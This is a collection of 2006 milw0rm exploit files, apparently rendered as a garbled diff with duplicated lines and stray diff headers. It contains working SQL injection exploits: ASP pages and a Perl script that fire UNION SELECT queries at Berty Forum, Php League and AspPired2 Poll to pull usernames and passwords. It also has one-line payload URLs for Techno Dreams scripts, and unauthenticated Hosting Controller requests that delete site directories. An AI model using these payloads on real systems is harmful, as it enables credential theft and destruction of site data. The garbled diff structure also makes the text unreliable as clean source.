|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum <=</b>v1.4(index.php) <u><b>
|
||||
Blind SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit1.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string1="/index.php?consult=1&indMemo="
|
||||
string2="-1%20union select%20"
|
||||
string3="mdp%20"
|
||||
string4="from%20"
|
||||
string5="membre%20"
|
||||
string6="where%20"
|
||||
string7="ind like%20"
|
||||
string8=Request.Form("id")
|
||||
string9="/index.php?consult=1&indMemo="
|
||||
string10="-1%20union select%20"
|
||||
string11="nom%20"
|
||||
string12="from%20"
|
||||
string13="membre%20"
|
||||
string14="where%20"
|
||||
string15="ind like%20"
|
||||
string16=Request.Form("id")
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit1.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
|
||||
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "GET" , come, FALSE
|
||||
.sEnd
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
get_password = take(target2)
|
||||
|
||||
getdata=InStr(get_username,"""720"" valign=""top"">" )
|
||||
username=Mid(get_username,getdata+19,20)
|
||||
passwd=Mid(get_password,getdata+19,20)
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">User Name:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial"> User Password:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-10-24]
|
||||
|
|
|
@ -1,179 +1,179 @@
|
|||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
'===============================================================================================
|
||||
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit2.asp
|
||||
|
||||
'[Note : exploit file name =>exploit2.asp
|
||||
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'===============================================================================================
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
|
||||
Remote SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit2.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string2="/consult/classement.php?champ='"
|
||||
string3="%20union%20select%200,0,concat(char(85),char(115),"
|
||||
string4="char(101),char(114),char(73),char(68),char(58),"
|
||||
string5="id,char(32),char(65),char(100),char(109)"
|
||||
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
|
||||
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
|
||||
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
|
||||
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
|
||||
string10="%20from%20phpl_membres%20where"
|
||||
string11="%20id%20like%20"
|
||||
string12=Request.Form("id")
|
||||
string13="/*"
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit2.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit2.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit2.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "GET" , come, FALSE
|
||||
.sEnd
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
|
||||
getdata=InStr(get_username,"0 0/" )
|
||||
username=Mid(get_username,getdata+5,90)
|
||||
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">Data:</font></b></td>
|
||||
<td width="80%">
|
||||
<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=username%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-10-27]
|
||||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
'===============================================================================================
|
||||
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit2.asp
|
||||
|
||||
'[Note : exploit file name =>exploit2.asp
|
||||
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'===============================================================================================
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
|
||||
Remote SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit2.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string2="/consult/classement.php?champ='"
|
||||
string3="%20union%20select%200,0,concat(char(85),char(115),"
|
||||
string4="char(101),char(114),char(73),char(68),char(58),"
|
||||
string5="id,char(32),char(65),char(100),char(109)"
|
||||
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
|
||||
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
|
||||
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
|
||||
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
|
||||
string10="%20from%20phpl_membres%20where"
|
||||
string11="%20id%20like%20"
|
||||
string12=Request.Form("id")
|
||||
string13="/*"
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit2.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit2.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit2.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "GET" , come, FALSE
|
||||
.sEnd
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
|
||||
getdata=InStr(get_username,"0 0/" )
|
||||
username=Mid(get_username,getdata+5,90)
|
||||
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">Data:</font></b></td>
|
||||
<td width="80%">
|
||||
<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=username%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-10-27]
|
||||
|
|
|
@ -1,46 +1,46 @@
|
|||
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
|
||||
|
||||
SQL_Injection, Command Injection
|
||||
|
||||
-------
|
||||
|
||||
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
|
||||
Vendor: Hosting Controller
|
||||
Vendor URL: www.hostingcontroller.com
|
||||
Solution: Hotfix 3.3
|
||||
Found Date: 7/1/2006
|
||||
Release Date: 10/10/2006
|
||||
|
||||
Discussion:
|
||||
--------------------
|
||||
UnAuthenticated user can
|
||||
1- delete every sites virtual directory on hc sites
|
||||
2- make forum virtual directory (with the desire name) for everysites on hc!
|
||||
3- disable all hc forums by SQL Injection
|
||||
4- enable all hc forums by SQL Injection
|
||||
|
||||
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.
|
||||
|
||||
Exploit: (or POC)
|
||||
--------------------
|
||||
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
|
||||
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
|
||||
-----------------------------------------------------------------
|
||||
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
|
||||
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
|
||||
-----------------------------------------------------------------
|
||||
3- unAuthenticated user can disable all hc forums by SQL_Injection
|
||||
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
|
||||
-----------------------------------------------------------------
|
||||
4- unAuthenticated user can enable all hc forums by SQL_Injection
|
||||
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
|
||||
--------------------
|
||||
|
||||
Credit :
|
||||
--------------------
|
||||
Soroush Dalili of Kapda and GSG
|
||||
IRSDL [4t} kapda <d0t] ir
|
||||
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
|
||||
GSG - Grayhatz security group [http://www.Grayhatz.net]
|
||||
|
||||
# milw0rm.com [2006-10-27]
|
||||
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
|
||||
|
||||
SQL_Injection, Command Injection
|
||||
|
||||
-------
|
||||
|
||||
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
|
||||
Vendor: Hosting Controller
|
||||
Vendor URL: www.hostingcontroller.com
|
||||
Solution: Hotfix 3.3
|
||||
Found Date: 7/1/2006
|
||||
Release Date: 10/10/2006
|
||||
|
||||
Discussion:
|
||||
--------------------
|
||||
UnAuthenticated user can
|
||||
1- delete every sites virtual directory on hc sites
|
||||
2- make forum virtual directory (with the desire name) for everysites on hc!
|
||||
3- disable all hc forums by SQL Injection
|
||||
4- enable all hc forums by SQL Injection
|
||||
|
||||
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.
|
||||
|
||||
Exploit: (or POC)
|
||||
--------------------
|
||||
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
|
||||
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
|
||||
-----------------------------------------------------------------
|
||||
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
|
||||
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
|
||||
-----------------------------------------------------------------
|
||||
3- unAuthenticated user can disable all hc forums by SQL_Injection
|
||||
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
|
||||
-----------------------------------------------------------------
|
||||
4- unAuthenticated user can enable all hc forums by SQL_Injection
|
||||
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
|
||||
--------------------
|
||||
|
||||
Credit :
|
||||
--------------------
|
||||
Soroush Dalili of Kapda and GSG
|
||||
IRSDL [4t} kapda <d0t] ir
|
||||
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
|
||||
GSG - Grayhatz security group [http://www.Grayhatz.net]
|
||||
|
||||
# milw0rm.com [2006-10-27]
|
||||
|
|
|
@ -1,21 +1,21 @@
|
|||
*******************************************************************************
|
||||
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Script Page: http://www.t-dreams.com
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]
|
||||
|
||||
Example:
|
||||
|
||||
//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-10-30]
|
||||
*******************************************************************************
|
||||
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Script Page: http://www.t-dreams.com
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]
|
||||
|
||||
Example:
|
||||
|
||||
//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-10-30]
|
||||
|
|
|
@ -1,21 +1,21 @@
|
|||
*******************************************************************************
|
||||
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Script Page: http://www.t-dreams.com
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/guestbookview.asp?key=[ SQL ]
|
||||
|
||||
Example:
|
||||
|
||||
//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-10-30]
|
||||
*******************************************************************************
|
||||
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Script Page: http://www.t-dreams.com
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/guestbookview.asp?key=[ SQL ]
|
||||
|
||||
Example:
|
||||
|
||||
//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-10-30]
|
||||
|
|
|
@ -1,87 +1,87 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
|
||||
[// Usage: class.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "MoreInfo.asp?id=";
|
||||
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
|
||||
$targettwo = $host.$dir.$file.$targettwo;
|
||||
|
||||
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /ltext\">(.*?)<\/td>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect for Password: $server\n";
|
||||
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket1 "GET $targettwo\n";
|
||||
print $socket1 "Host: $server\n";
|
||||
print $socket1 "Accept: */*\n";
|
||||
print $socket1 "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket1>) {
|
||||
if ($answer =~ /ltext\">(.*?)<\/td>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Password: $1\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-09]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
|
||||
[// Usage: class.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "MoreInfo.asp?id=";
|
||||
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
|
||||
$targettwo = $host.$dir.$file.$targettwo;
|
||||
|
||||
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
